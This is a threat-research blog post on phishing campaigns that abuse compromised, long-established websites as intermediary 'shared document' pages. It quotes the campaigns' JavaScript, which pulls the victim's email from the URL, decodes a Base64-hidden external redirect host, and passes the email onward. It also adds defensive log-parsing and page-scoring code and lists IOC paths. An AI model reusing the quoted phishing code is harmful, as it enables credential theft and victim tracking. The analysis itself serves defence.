
Over 100 Domains Hijacked: What You Need to Know About the Latest Phishing Tactics
Two Active Campaigns, One Playbook
Recent research has identified two near‑identical active phishing campaigns that weaponize 100+ compromised websites to host intermediary pages. These pages sit between the phishing email and the final credential‑stealing form. They look innocuous, appearing to host a secure business document on an otherwise legitimate website, but they quietly pass tracking parameters and funnel the victim onward.
What makes these campaigns worth spotlighting is the type and age of domains being abused. We are not talking about content-hosting platforms like Canva or Google Drive, nor are we talking about newly registered domains. Most domains are older than one year, and the oldest we recorded was registered in 1997 and still touts a solid online reputation.
Compromised Sites as Stepping Stones
A handful of the abused sites we have identified belong to hosting‑only services, such as linodeobjects.com. Yet the majority of the over 100 domains appear to be real businesses whose sites have been breached and abused in these chained phishing sequences.
The distinct domains span a wide range of countries and top‑level domains—including .com, .com.br, .gr, .ci, .in, .si, .biz, .co.za, .gov.cv, .co.ke, .tn, .fr. This wide range is also reflected in their business type and their age range.
Age matters—just not the way you think
Below is the age distribution for every domain we identified hosting these campaigns’ intermediary phishing pages. Forty of them are “young” (< 1 year), but once those are removed, the average registration age is 8.3 years, and the median age is 6.3 years—proof that age-based and reputation‑based blocking is not enough to protect employees from credential-theft attacks.
[Chart: registration-age distribution of the domains hosting the intermediary phishing pages]
So what do these intermediary pages look like?
Social‑Engineering Lure: “Shared Document”
Both campaigns lean on the universal urge to open a business file that appears to be meant for you. We observed two unique page titles:
- Secure Document Sharing | Your Company
- Business Document Shared

Malicious Page Sits One Folder Deep
Each malicious file sits one folder deep (https://example.com/**folder**/**file**)—consistent enough to appear deliberate, yet far enough from the root web directory to avoid casual scans.
More than half of the file paths contain explicit file‑type keywords—such as memo, document, agreement, bid, proposal, or RFP—reinforcing the illusion that you have received access to a legitimate business file.
/tunnel/email-template.html
/bid/proposal.html
/2/kabeenet.html
/home/home.html
/bid/submission.html
/tunnel/index.html
/tunnel/dantedocs.html
/invite/policy.html
For a full list of file paths observed, refer to the IOCs section.
JavaScript That Knows Who You Are
A snippet from the intermediary page checks whether the URL hash property contains an email address, either in plain text (e.g., https://example.com/file#john.doe@example.com) or Base64‑encoded (e.g., https://example.com/file#am9obi5kb2VAZXhhbXBsZS5jb20=). If it does contain an email, the script:
1. Auto-populates the email address into the form field. This increases the chance the victim will submit the form and move forward in the attack sequence.
```javascript
// Decode email from URL hash
function getEmailFromHash() {
  let hash = window.location.hash.substring(1);
  if (!hash) return '';
  // Try to decode if it's Base64 encoded
  try {
    // Check if it looks like Base64
    if (hash.match(/^[A-Za-z0-9+/=]+$/)) {
      const decoded = atob(hash);
      if (decoded.includes('@')) {
        return decoded;
      }
    }
  } catch (e) {
    // Not Base64, continue with hash as is
  }
  return hash;
}
// Auto-populate email field if it exists in the URL hash
document.addEventListener('DOMContentLoaded', function() {
  const emailField = document.getElementById('email');
  const emailFromHash = getEmailFromHash();
  if (emailFromHash && emailFromHash.includes('@')) {
    emailField.value = emailFromHash;
  }
});
```

```javascript
// Function to decode Base64
function decodeBase64(str) {
  try {
    return decodeURIComponent(atob(str).split('').map(char => {
      return '%' + ('00' + char.charCodeAt(0).toString(16)).slice(-2);
    }).join(''));
  } catch (e) {
    return null; // Return null if decoding fails
  }
}
// Auto-populate email from URL hash
const emailFromHash = window.location.hash.substring(1); // Remove the '#' from the hash
if (emailFromHash) {
  let email = emailFromHash;
  // Check if the hash is Base64 encoded
  if (!emailFromHash.includes('@')) {
    email = decodeBase64(emailFromHash); // Decode Base64
  }
  if (email && email.includes('@')) {
    document.getElementById('email').value = email;
  }
}
```

Snippets of JavaScript from each campaign that extract the target’s email address from the URL’s hash property, if present.
2. Passes the email address onto the final phishing page. So, even if the user never inputs their password in the final phishing page, the attacker learns that john.doe@example.com clicked on the malicious email and is a likely candidate to retarget later.
```javascript
// Form submission handling
document.getElementById('emailForm').addEventListener('submit', function(e) {
  e.preventDefault();
  const email = document.getElementById('email').value;
  if (!email) return;
  // Show loading spinner
  document.getElementById('loadingOverlay').classList.add('active');
  // Obfuscate the redirect URL
  const redirectBase = atob('aHR0cHM6Ly82OWU2NGU5Ny5sYmFja3VwMTMxMy53b3JrZXJzLmRldi8');
  // Simulate API call with rate limiting
  setTimeout(function() {
    // Remove loading spinner
    document.getElementById('loadingOverlay').classList.remove('active');
    // Redirect to external site with email hash
    window.location.href = redirectBase + '?ref=' + email;
  }, 1500);
});
```

```javascript
// Excerpt from inside an async submit handler (the awaits require one); `email`
// and `captchaToken` are set earlier in code that is not shown here.
// Use the current file's directory for the API endpoint
const apiUrl = window.location.pathname.replace(/\/[^\/]+$/, '/validate-captcha.php');
const response = await fetch(apiUrl, {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'X-Requested-With': 'XMLHttpRequest'
  },
  body: JSON.stringify({
    email,
    captchaResponse: captchaToken
  })
});
const data = await response.json();
if (data.success && data.redirectUrl) {
  // Append the email directly after the domain (no trailing slash)
  const finalUrl = `${data.redirectUrl}#M${email}`;
  window.location.href = finalUrl;
} else {
  throw new Error(data.error || 'Validation failed');
}
```

Snippets of JavaScript from each campaign that ultimately redirect the browser tab to a phishing page with the victim’s email address in the query parameters or hash property.
We first documented this URL-based email tracking technique in our analysis of this SVG phishing email attachment.
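The tracking just described leaves a useful trace for defenders: every URL the victim's browser requested carries the recipient address, so proxy or mail-gateway logs reveal which users the attacker now knows have clicked. The following is an added example, not code from this post or from the campaigns, that recovers that address from the placements quoted above (a plain or Base64 fragment on the intermediary page, `?ref=` or a `#M` fragment on the final page) and runs it over a few constructed log lines; the log format, host names and thresholds are assumptions.

```javascript
// Added example (not from the Keep Aware post or the campaigns): recover the
// tracked recipient from URLs recorded by a proxy or mail gateway, so incident
// responders can tell which users the attacker now knows clicked.
const EMAIL_RE = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;

// Percent-decode without throwing on malformed sequences.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Decode a Base64 candidate; null if it is not Base64 or does not decode to an e-mail.
function decodeBase64Email(candidate) {
  if (!/^[A-Za-z0-9+/=]+$/.test(candidate)) return null;
  const decoded = Buffer.from(candidate, 'base64').toString('utf8');
  return EMAIL_RE.test(decoded) ? decoded : null;
}

// Returns { email, encoding, placement } or null when the URL carries no recipient.
function extractRecipient(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch (e) { return null; }

  const candidates = [];
  const fragment = safeDecode(url.hash.replace(/^#/, ''));
  if (fragment) {
    // One campaign's final page puts a literal "M" before the address (`#M${email}`
    // in the quoted snippet). Strip it only when the remainder is an e-mail; an
    // address that itself starts with "M" is ambiguous and should be confirmed
    // against the earlier intermediary-page request from the same host.
    if (fragment.startsWith('M') && EMAIL_RE.test(fragment.slice(1))) {
      candidates.push({ value: fragment.slice(1), placement: 'fragment-M' });
    } else {
      candidates.push({ value: fragment, placement: 'fragment' });
    }
  }
  const ref = url.searchParams.get('ref'); // "?ref=<email>" on the other final page
  if (ref) candidates.push({ value: ref, placement: 'query-ref' });

  for (const c of candidates) {
    if (EMAIL_RE.test(c.value)) return { email: c.value, encoding: 'plain', placement: c.placement };
    const decoded = decodeBase64Email(c.value);
    if (decoded) return { email: decoded, encoding: 'base64', placement: c.placement };
  }
  return null;
}

// Constructed sample proxy log lines (not real telemetry): "<timestamp> <host> <url>".
const SAMPLE_LOG = [
  '2025-04-04T09:12:03Z wkstn-17 https://example.com/bid/proposal.html#john.doe@example.com',
  '2025-04-04T09:12:09Z wkstn-17 https://landing.example.invalid/?ref=john.doe@example.com',
  '2025-04-04T09:30:41Z wkstn-22 https://example.com/tunnel/index.html#amFuZS5yb2VAZXhhbXBsZS5jb20=',
  '2025-04-04T09:30:47Z wkstn-22 https://final.example.invalid/#Mjane.roe@example.com',
  '2025-04-04T10:02:15Z wkstn-05 https://example.com/home/home.html',
];

// Walk the log and report every URL that leaked a recipient address.
function findTrackedRecipients(lines) {
  const hits = [];
  for (const line of lines) {
    const [ts, host, url] = line.trim().split(/\s+/);
    const r = extractRecipient(url);
    if (r) hits.push({ ts, host, url, ...r });
  }
  return hits;
}

for (const h of findTrackedRecipients(SAMPLE_LOG)) {
  console.log(`${h.ts} ${h.host} -> ${h.email} (${h.encoding}, ${h.placement})`);
}
```

Run under Node; the two requests from `wkstn-22` show the same recipient first Base64-encoded on the compromised site and then in clear on the final page, which is the pairing an analyst uses to confirm the `M` marker reading.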
The Chained Sequence: Email → Legit Site → Phishing Form
Keep Aware’s security team is no stranger to chained phishing sequences. We have written before about attackers abusing trusted content platforms like Dropbox, Canva, and Google Drawings as stepping stones in a phishing attack. These active campaigns prove that even long-standing domains—the ones that don’t host user content—are equally at risk and follow a very similar sequence:
- Phishing email contains a link to a compromised but reputable domain.
- Intermediary page (on that domain) loads, presents an ‘enter your email to view a document’ call to action, executes malicious JavaScript, and redirects to the final phishing page.
- Final phishing page harvests the victim’s credentials.
[Diagram: the chained sequence from phishing email to compromised site to final phishing form]
Precision‑Validated Phishing
After submitting an email, many of these malicious forms send users to a fake Microsoft login page; some, however, return a customized response—a blank page or a tailored phishing page—depending on the email address provided. This custom response based on the email address is referred to as precision-validated phishing, or email-validated phishing.
This newly coined technique keeps the final phishing page off threat intel feeds for longer, letting its reputation stay “clean”. As use of this technique grows, web intel feeds become less effective, and the need for inline page-level protection increases.
Why Inline Browser Protection Matters
Because inline browser tools can interrogate each web page, looking for credential fields, background network requests, obfuscated JavaScript, and social engineering prompts, they judge a page by what it shows and does rather than its age or reputation.
That behavioral focus means the very first time a previously unknown (i.e., zero‑day) phishing site loads, a security extension with browser-native visibility and control can identify the malicious activity, display a block banner, and ensure no credentials are stolen—long before threat intel feeds or reputation scanners even know the domain exists.
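To make the behavioral idea concrete, here is an added example, not code from this post or from any Keep Aware product, of a content-level scorer that judges a page by what its markup and inline scripts do rather than by the age or reputation of its domain. The signals model the behaviours quoted earlier (reading the URL fragment, auto-filling the email field, a Base64-obfuscated redirect target, a background "validation" request, a redirect that carries the email, and a "shared document" title); the weights, thresholds and the two sample pages are constructed assumptions.

```javascript
// Added example (not from the Keep Aware post or any Keep Aware product): score a
// fetched page by the behaviours in its source, independent of domain reputation.

// Decode every atob('...') literal so an analyst sees where the page really intends
// to send the browser instead of the Base64 the attacker left in the script.
function decodeAtobLiterals(source) {
  const found = [];
  const re = /atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    found.push({ literal: m[1], decoded: Buffer.from(m[1], 'base64').toString('utf8') });
  }
  return found;
}

// Each signal is a regex over the raw page source or a predicate; weights are assumed.
const SIGNALS = [
  { name: 'reads-url-fragment',       weight: 1, re: /location\.hash/ },
  { name: 'email-autofill-from-url',  weight: 2, re: /getElementById\(['"]email['"]\)\.value\s*=/ },
  { name: 'base64-obfuscated-url',    weight: 3,
    test: (src) => decodeAtobLiterals(src).some((x) => /^https?:\/\//.test(x.decoded)) },
  { name: 'credential-or-email-form', weight: 1, re: /<input[^>]+type=["'](?:email|password)["']/i },
  { name: 'email-in-redirect',        weight: 3, re: /location\.href\s*=[^;]*\b(?:email|ref)\b/ },
  { name: 'background-validation',    weight: 2, re: /fetch\(\s*[^)]*validate/ },
  { name: 'document-lure-title',      weight: 1, re: /<title>[^<]*(?:document|shared|secure)[^<]*<\/title>/i },
];

// Score a page; 'block' means the page should be interrupted before any form submits.
function scorePage(html) {
  const matched = SIGNALS.filter((s) => (s.re ? s.re.test(html) : s.test(html)));
  const score = matched.reduce((sum, s) => sum + s.weight, 0);
  const verdict = score >= 6 ? 'block' : score >= 3 ? 'review' : 'allow';
  return {
    score,
    verdict,
    signals: matched.map((s) => s.name),
    decodedUrls: decodeAtobLiterals(html).map((x) => x.decoded),
  };
}

// Constructed sample modelled on the quoted intermediary snippets (not a live capture).
// The atob literal is the Base64 of the placeholder https://landing.example.invalid/.
const SAMPLE_LURE_PAGE = `
<html><head><title>Secure Document Sharing | Your Company</title></head>
<body>
<form id="emailForm"><input type="email" id="email"><button>View document</button></form>
<script>
  const email = window.location.hash.substring(1);
  if (email.includes('@')) document.getElementById('email').value = email;
  const redirectBase = atob('aHR0cHM6Ly9sYW5kaW5nLmV4YW1wbGUuaW52YWxpZC8=');
  document.getElementById('emailForm').addEventListener('submit', (e) => {
    e.preventDefault();
    window.location.href = redirectBase + '?ref=' + email;
  });
</script></body></html>`;

// Constructed ordinary contact form: an e-mail field alone should not trip the scorer.
const SAMPLE_BENIGN_PAGE = `
<html><head><title>Contact us</title></head>
<body><form action="/contact" method="post"><input type="email" name="email">
<textarea name="msg"></textarea><button>Send</button></form></body></html>`;

for (const [label, page] of [['lure', SAMPLE_LURE_PAGE], ['benign', SAMPLE_BENIGN_PAGE]]) {
  const r = scorePage(page);
  console.log(`${label}: ${r.verdict} (score ${r.score}) signals=${r.signals.join(',')} urls=${r.decodedUrls.join(',')}`);
}
```

The point of the design is that none of the signals consult the domain: the 1997-registered site and the freshly compromised .gov.cv site produce the same verdict for the same page source, and the decoded `atob` target gives the analyst the next hop for takedown or blocking.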
Conclusion
Phishing defenses can no longer rely on lists of “known-bad” domains or the assumption that age and reputation equal safety. These two campaigns demonstrate that well‑established, legitimate websites—some online since the late 1990s—can be hijacked and pressed into service as stepping stones of malicious campaigns. By sitting one folder deep, mimicking file‑sharing flows, and selectively revealing the final form only after validating the victim’s email, attackers stretch the lifetime of their infrastructure and stay below the radar of threat intel feeds.
Defenders need controls that judge a page by its content and behavior at the moment it renders. Inline, real‑time browser protection analyzes the web page, its JavaScript, network calls, and form actions—blocking zero‑day phishing sites before they can harvest credentials. Combined with user‑centric training that teaches employees to scrutinize domains, paths, and unexpected “document” prompts, this last‑mile layer closes the gaps left by reputation‑based tools, regardless of email validation techniques or the abuse of legitimate sites.
IOCs
Unique File Paths:
/tunnel/email-template.html
/bid/proposal.html
/2/kabeenet.html
/home/home.html
/bid/submission.html
/tunnel/index.html
/tunnel/dantedocs.html
/invite/policy.html
/proceed/pesse.html
/record/form.html
/tunnel/home.html
/sharedsuccess/home.html
/bid/estimate.html
/champ/scanning.html
/bid/ppfpropo.html
/source/policy.html
/tunnel/file/index.html
/tunnel/wedsn.html
/tunnelvwork/eeuaakgjhguuuadobeflowscannedf1le.html
/secure/
/workers-team/email-template.html
/RNP58387966C2BB/scan.html
/panthera/bidpackages/a9tmjwEh2qLJw3bhZK5METbPIGprzt.html
/incoming-bid-proposal/psconstruction.html
/tunnel/qgov.html
/furniture/home.html
/zoom/scan.html
/memo/home.html
/tunnel/madriducldoc.html
/tunel/bigbangdocs.html
/developer/preview-form.html
/archiev/policy.html
/drive/proposal028.html
/1/newdocuments.html
/iron/email-template.html
/autodocs/email-template.html
/re/email.html
/bid/propose.html
/content/fileshare
/au/email-template.html
/active/email-template.html
/tunnel/email-prodoc.html
/accept/email-template.html
/wp-admin/css/main/policy.html
/acquired/email-template.html
/team-work-unity/email-template.html
/timing-construct/email-template.html
/collectrd/email-template.html
/tunnel/futuredocs.html
/offers/homie.html
/document/newventure.html
/invitation/secure.html
/team/home.html
/fileshare/company.html
/tunnel/tuesm.html
/cstorefile/email-template.html
/4/email-template.html
/rev/projectview.html
/master/march2025.html
/team-workers/email-template.html
/sui/email-template.html
/tunnel/tryinggthis%20to%20see.html
/1/sgw.html
/realestate/deals.html
/SKMT234542234/email-template.html
/weekly-ap/email-template.html
/legalframework/email-template.html
/service/law.html
/Project/Project.html
/educ/pesse.html
/tunel/newcastledocs.html
/Realestate/email-template.html
/04042025/april4th.html
/woqp/home.html
/04042025/tigercat.html
/offers/home.html
/tunsile/email-template.html
/here/mini.html
/rfpshare/transverse.html
/mile/email-template.html
/review/email-template.html
/cig.bin/file/email-template.html
/onlstorage/email-template.html
/lqwiskk-woeqzlkj/r3evie-wodo0c/l2lkw2docum3nnt
/teamwork/email-template.html
/Itshighsigndoc/M1icrosfotDocsignre5trtr-lkgl-viewattachment
/glass/gain.html
/2/newdocs.html
/fonomuch/capitalrfp.html
/tunelstorage/email-template.html
/tunnel/email-auth280.html
/team-admin/email-template.html
/tteam/compliance.html
/team-work/email-template.html
/2/wepumpit.html
/vission/scannedemail-templateflow1903884=mhfnjfn0hnjn-0jhjc.html
/construction/order.html
/registered/rfp.html
/team/ComplianceRFPproject.html
/tinseal/email-template.html
/tunnel/mail-filerecords.html
/tunnel/email-bidinvitation.html
/panthera/bidpackages/hdyu2jDGyruej32n3.html
/New/Project.html
/files/docnew.html
/home.html
/hom.html
/legal/agreement.html
/gov/edu.html
/gov/sch.html
/tunnel/apprfp.html
/tunel/walkingdocs.html
/tunnel/chairdocs.html
/riaz/riazsahilawoffice.html
/memo/agreement.html
/civil/pesse.html
/wedsdata/tend.html
/tunnel/mankd.html
/team-workers/project-template.html
/team-zoom/project-template.html
/edu/home.html
/cap/available.html